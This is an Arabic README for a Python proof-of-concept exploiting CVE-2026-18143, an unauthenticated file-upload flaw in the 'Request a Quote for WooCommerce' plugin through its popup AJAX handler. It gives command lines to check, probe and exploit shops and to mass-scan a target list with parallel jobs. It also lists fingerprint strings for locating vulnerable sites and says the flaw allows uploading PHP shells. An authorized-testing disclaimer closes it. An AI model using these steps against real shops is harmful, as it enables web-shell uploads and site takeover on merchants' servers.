
Python PoC يتحقق من CVE-2026-18143 ويستغلها، وهي ثغرة رفع ملفات عشوائية بدون مصادقة في Addify Request a Quote for WooCommerce ≤ 2.9.2 عبر معالج AJAX الخاص بالنافذة المنبثقة.
Python 3 PoC لـ CVE-2026-18143 في Request a Quote for WooCommerce (woocommerce-request-a-quote, Addify / WooCommerce.com).
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 يسمح بـ رفع ملفات عشوائي بدون مصادقة (CWE-434، CVSS 9.8 حرج) عبر afrfq_submit_quote_via_popup(). يستدعي معالج النافذة المنبثقة move_uploaded_file() باستخدام اسم الملف الخام من العميل دون قائمة سماح للامتدادات أو نوع MIME، ويكتب في دليل رفع RFQ مؤقت يمكن الوصول إليه عبر الويب. يمكن للمهاجمين رفع .php shells عندما تستخدم قاعدة عرض سعر عامة تدفق النافذة المنبثقة متعددة الصفحات. تم إصلاحه في > 2.9.2.
صفحة PoC: https://pocbit.org/pocs/cve-2026-18143
الفهرس: https://pocbit.org/pocs/
| المنتج | Request a Quote for WooCommerce (Addify) |
| مسار الإضافة | wp-content/plugins/woocommerce-request-a-quote/ |
| المتأثر | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| المتطلب المسبق | تمكين قاعدة عرض السعر المنبثقة على واجهة المتجر |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
عادةً ما يكون Nonce في JavaScript للواجهة الأمامية (كائن afrfq المترجم) على صفحات المتجر/المنتج عندما تكون نافذة عرض السعر المنبثقة نشطة.
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
للاختبار المصرح به فقط. --upload-probe / --mode exploit يكتبان ملفات إلى الهدف.